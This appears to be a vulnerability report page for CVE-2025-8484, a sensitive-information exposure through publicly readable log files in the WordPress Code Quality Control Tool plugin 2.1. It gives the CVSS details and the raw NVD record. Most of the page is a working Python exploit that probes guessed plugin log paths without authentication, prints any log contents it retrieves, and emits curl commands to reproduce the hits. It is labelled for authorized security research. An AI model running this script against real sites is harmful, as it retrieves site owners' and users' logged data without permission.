Security Vulnerability Report
CVE-2025-8484 CVSS 5.3 MEDIUM

CVE-2025-8484

Published: 2025-10-11 10:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Code Quality Control Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in version 2.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is published for this CVE (the raw NVD record below carries no "configurations" element); the affected product and version named in the description are listed here instead.

Code Quality Control Tool 2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it only against systems you own or have written permission to test; it sends unauthenticated HTTP requests to the target and prints the contents of any log file it finds, which may itself contain sensitive data.
python
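# CVE-2025-8484 - WordPress Code Quality Control Tool Sensitive Information Exposure PoC
#
# The plugin (v2.1) leaves its error log readable under the plugin directory
# (CWE-200). This script requests the usual candidate paths and reports any
# that answer with log-like content.
#
# Standard library only (urllib instead of requests) so it runs without an
# install step. TLS certificates are verified, as urllib does by default; do
# not disable that for a PoC that is pointed at production hosts.
import http.client
import sys
import urllib.error
import urllib.request

# Candidate log locations relative to the site root. The real file name is
# whatever the plugin's error_logger.php writes to (the NVD reference points at
# line 71 of that file); if none of these hit, confirm the name against the
# plugin source before concluding the target is unaffected.
LOG_PATHS = [
    "/wp-content/plugins/code-quality-control-tool/error_log.txt",
    "/wp-content/plugins/code-quality-control-tool/error.log",
    "/wp-content/plugins/code-quality-control-tool/logs/error.log",
    "/wp-content/plugins/code-quality-control-tool/debug.log",
    "/wp-content/plugins/code-quality-control-tool/error_logger.log",
]

# Identify the tool honestly rather than as a browser; the default
# "Python-urllib" agent is blocked outright by some WAF rulesets.
USER_AGENT = "CVE-2025-8484-check/1.0"

# A body served as one of these is a web page, not a log, even when the
# status is 200 (catch-all 404 pages and WAF block pages do exactly that).
_HTML_CONTENT_TYPES = ("text/html", "application/xhtml+xml")
_HTML_PREFIXES = (b"<!doctype", b"<html", b"<?xml")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx answers instead of following them (allow_redirects=False).

    A redirect to the login page or to "/" would otherwise be reported as a
    200 hit on the log path.
    """

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Returning None tells urllib the redirect is not handled, so the
        # 3xx propagates as an HTTPError that _fetch turns into a plain result.
        return None


def _fetch(url, timeout):
    """GET *url* without following redirects.

    Returns ``(status, headers, body)``. Non-2xx answers (including the 3xx a
    redirect would produce) are returned the same way instead of raising, so
    the caller can classify 403 vs 404. Transport failures propagate as
    urllib.error.URLError / OSError / http.client.HTTPException.
    """
    opener = urllib.request.build_opener(_NoRedirect)
    request = urllib.request.Request(url, headers={"User-Agent": USER_AGENT})
    try:
        with opener.open(request, timeout=timeout) as response:
            return response.status, response.headers, response.read()
    except urllib.error.HTTPError as err:
        # HTTPError doubles as the response object; it has no file object
        # when the connection died before a body arrived.
        body = err.read() if getattr(err, "fp", None) is not None else b""
        return err.code, err.headers, body


def looks_like_log(status, headers, body):
    """Return True when a response plausibly is an exposed log file.

    The original check ("200 and non-empty") reports a hit on every site whose
    theme or WAF answers 200 with an HTML page for unknown paths, i.e. it
    confirms the vulnerability on hosts that do not even run the plugin. A hit
    therefore also has to be served as something other than HTML, judged by
    the Content-Type header and, failing that, by the first bytes of the body.

    Args:
        status: HTTP status code.
        headers: mapping with a case-insensitive ``get`` (dict or HTTPMessage).
        body: raw response bytes.
    """
    if status != 200 or not body:
        return False
    content_type = (headers.get("Content-Type") or "").lower()
    if content_type.startswith(_HTML_CONTENT_TYPES):
        return False
    return not body[:64].lstrip().lower().startswith(_HTML_PREFIXES)


def exploit(target_url, timeout=10):
    """Probe *target_url* for the plugin's exposed log files.

    Args:
        target_url: site root including scheme, e.g. ``https://example.com``.
        timeout: per-request timeout in seconds.

    Returns:
        A list of ``{"url", "size", "content"}`` dicts, one per path that
        returned log-like content; empty when nothing was found. Transport
        errors are printed and skipped rather than aborting the run.
    """
    base = target_url.rstrip("/")
    print(f"[*] Targeting: {target_url}")
    print(f"[*] CVE-2025-8484 - Sensitive Information Exposure")
    print("-" * 60)

    found_files = []
    for path in LOG_PATHS:
        url = base + path
        try:
            status, headers, body = _fetch(url, timeout)
        except (urllib.error.URLError, http.client.HTTPException, OSError, ValueError) as err:
            # ValueError covers "unknown url type" when the scheme is missing.
            print(f"[!] Error accessing {url}: {err}")
            continue

        if looks_like_log(status, headers, body):
            # Logs are text; decode leniently so a stray byte cannot crash
            # the run after the interesting part was already retrieved.
            text = body.decode("utf-8", errors="replace")
            print(f"[+] FOUND: {url}")
            print(f"    Status: {status}")
            print(f"    Size: {len(body)} bytes")
            # Display first 500 chars of log content
            print(f"    Preview:\n{text[:500]}")
            print("-" * 60)
            found_files.append({"url": url, "size": len(body), "content": text})
        elif status == 403:
            print(f"[-] Access Denied: {url}")
        else:
            print(f"[-] Not Found ({status}): {url}")
    return found_files


def curl_exploit(target_url, log_path):
    """Print and return the one-line curl reproduction for *log_path*.

    Usage: curl -s http://target.com/wp-content/plugins/code-quality-control-tool/error_log.txt
    """
    full_url = target_url.rstrip("/") + log_path
    command = f"curl -s '{full_url}'"
    print(f"\n[*] Curl command to reproduce:")
    print(f"    {command}")
    return command


def main(argv):
    """CLI entry point: ``python3 cve-2025-8484.py <target_url>``."""
    if len(argv) < 2:
        print("Usage: python3 cve-2025-8484.py <target_url>")
        print("Example: python3 cve-2025-8484.py https://example.com")
        return 1
    target = argv[1]
    if not target.startswith(("http://", "https://")):
        # Without a scheme every probe would just log "unknown url type" and
        # the run would look like a clean miss.
        print("[!] target_url must start with http:// or https://")
        return 1

    results = exploit(target)
    if results:
        print(f"\n[!] Vulnerability confirmed! Found {len(results)} exposed log file(s)")
        print("[!] Sensitive information may be exposed to unauthenticated attackers")
        base_len = len(target.rstrip("/"))
        for hit in results:
            curl_exploit(target, hit["url"][base_len:])
    else:
        print("\n[-] No exposed log files found or vulnerability has been patched")
        # A miss is not proof of a fix: the log name may differ from the
        # candidates above, or a WAF may be filtering the requests.
        print("[-] Note: a miss does not prove the target is fixed; verify the log file name against error_logger.php")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))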

References (listed in the raw JSON record below): the plugin's error_logger.php on plugins.trac.wordpress.org (line 71), plugins.trac changeset 3385766, and Wordfence advisory b64635f4-abc0-4e69-89e4-357840c5e776.

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8484", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:43.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Code Quality Control Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in version 2.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/code-quality-control-tool/trunk/error_logger.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385766/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b64635f4-abc0-4e69-89e4-357840c5e776?source=cve", "source": "[email protected]"}]}}